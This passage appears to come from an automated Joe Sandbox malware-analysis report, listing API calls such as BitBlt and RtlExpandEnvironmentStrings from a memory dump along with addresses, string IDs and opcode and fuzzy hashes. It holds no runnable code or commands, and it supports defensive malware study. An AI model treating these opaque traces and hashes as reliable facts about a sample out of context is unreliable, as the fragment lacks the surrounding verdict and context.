                                                                                                                                                                                                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 02176C71
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelect
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2843486406-0
                                                                                                                                                                                                                              • Opcode ID: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
                                                                                                                                                                                                                              • Instruction ID: 08900528ff1c360cb19f823163326be9c51b10f0d23f75d177bc165e7b8b6912
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2214FB9544310EFE3509F609C49B2B7BF8EB8AB11F014929FA59A2290D77498048B67
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 02165411
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                              • String ID: +$e$+$e$XY$E#G
                                                                                                                                                                                                                              • API String ID: 237503144-1023387988
                                                                                                                                                                                                                              • Opcode ID: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
                                                                                                                                                                                                                              • Instruction ID: 377d0ac339a0344efd4b698764fb5e9ee1cdb6153d709128202144f98ac42ce9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7121083424C344AFD3148F65D88176FBBE1EBC5714F25C92CE5A857282D775C80A8F86
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 02165B5B
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                              • String ID: B"@$`J/H$rp
                                                                                                                                                                                                                              • API String ID: 237503144-3817236508
                                                                                                                                                                                                                              • Opcode ID: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
                                                                                                                                                                                                                              • Instruction ID: bd7b94b49be2b124d45c71f067b5b0a5dec81f19012a1fb7259845fea9733199
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4831CDB0E443489FDB10CFA9D8827EEBBB2EF45700F50002CE441BB295D6B55906CFA9